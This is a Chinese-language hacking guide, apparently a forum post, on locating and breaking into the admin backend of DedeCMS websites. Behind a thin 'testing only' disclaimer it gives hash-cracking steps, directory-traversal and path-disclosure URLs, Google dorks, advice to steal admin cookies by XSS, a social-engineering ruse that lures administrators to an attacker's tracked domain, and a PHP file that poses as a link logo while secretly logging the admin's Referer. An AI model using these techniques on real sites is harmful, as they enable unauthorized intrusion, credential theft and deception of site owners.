仅能用作网站安全测试,非法用途万不可取
解密:织梦密码是cmd5加密,为20位,去掉前三位与后一位。
后台:默认的是dede/login.php
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
员帐号,新版本的就直接转向了后台.
2.include/dialog/config.php会爆出后台管理路径
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
到根目录去.不过这些版本的访问地址有些不同.
地址为require/dialog/select_soft.php?activepath=/././././././././
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
存在相同问题的文件还有
include\dialog\select_images.php
include\dialog\select_media.php
include\dialog\select_templets.php
6.有时后台也可以利用http://xxx.com/include/fckeditor/editor/fckeditor.html直接跳转到后台
或者网址名称其他的一些。
首先是默认后台地址:/dede
然后,比较懒的站长会改成/admin,/manage (可以用burpsuite进行目录枚举)
织梦dedecms利用文件查找后台的技巧:
1、/include/dialog/select_media.php?f=form1.murl
2、/include/dialog/select_soft.php
3.使用mysql_error 信息去试试
/data/mysql_error_trace.inc
4./robots.txt
/data/admin/ver.txt
5.DedeCmsV5.1 FreeSP1访问
http://127.0.0.1/include/dialog/ … =/include/FCKeditor
可以跳转目录跳转到根目录的方法为:
http://127.0.0.1/include/dialog/ … h=/././././././././
而且DEDECMS在访问不存在的目录时会报错如访问
http://127.0.0.1/include/dialog/ … t0pst0pst0pst0pst0p
DedeCMS V5.3.1和最新的DedeCMS V5.5正式版,发现这两个版本已经进行了处理,而且只会列出目录和一些允许显示的文件,PHP是不能显示了,爆路径是一样通用的构造
http://127.0.0.1/include/dialog/ … =/include/FCKeditor
其实方法很简单自己偶然发现的:
通过百度的浏量统计找到后台地址
只要是流量统计网站都可以,其实不用百度,
(1)xxoo:弄一个你能看到流量统计的域名
(2)ooxx:去给管理员留言,吧你域名通过网站留言发给他说要加友情链接,他肯定会在后台看的,
(3)oxxo:等他看了你的留言,他肯定会打开你的网址,你去自己域名的流量哪里看看 ‘入口页面’ 就能看到他网站的后台地址
7.利用xss
这个不能单单算是找后台了,因为xss会x到管理的cookie和后台地址,或者是xss结合csrf可以直接拿shell,详细请见wooyun
8.google hack
在搜索引擎里面所有这个关键字,点开连接之后,再去掉这个关键字,他的后台就出来了
原理就是dedecms网站的后台都有这么一个广告,而且通常都是在网站后台后面
所以,只要有这个广告的网站,基本都能暴露后台了。
这是关键字
inurl:?dopost=showad site:xxoo.com
9.织梦某处设计缺陷导致后台地址泄露
DEDECMS对友情链接申请的LOGO地址没有进行严格的判断和过滤,导致可以提交PHP、ASP等后缀。
且后台查看友情链接时,如下图所示,图片仍是申请时提交的URL。
X.PHP 代码:
<?php file_put_contents('x.txt',$_SERVER['HTTP_REFERER']); header("Content-type:image/jpeg"); $img=imagecreatefromjpeg("x.jpg"); imagejpeg($img); imagedestroy($img); ?>
当访问该文件,获取$_SERVER[‘HTTP_REFERER’],并且写出文件到X.TXT。
其他方法:可以社工猜解,利用google hack :”site:xxoo.com inurl:login.php 织梦管理中心”
以上方法为以前的常用方法,适用于织梦过去的版本,漏洞不兼容,哈哈哈.本版本是我自己使用的版本,综合了众多的织梦后台暴露漏洞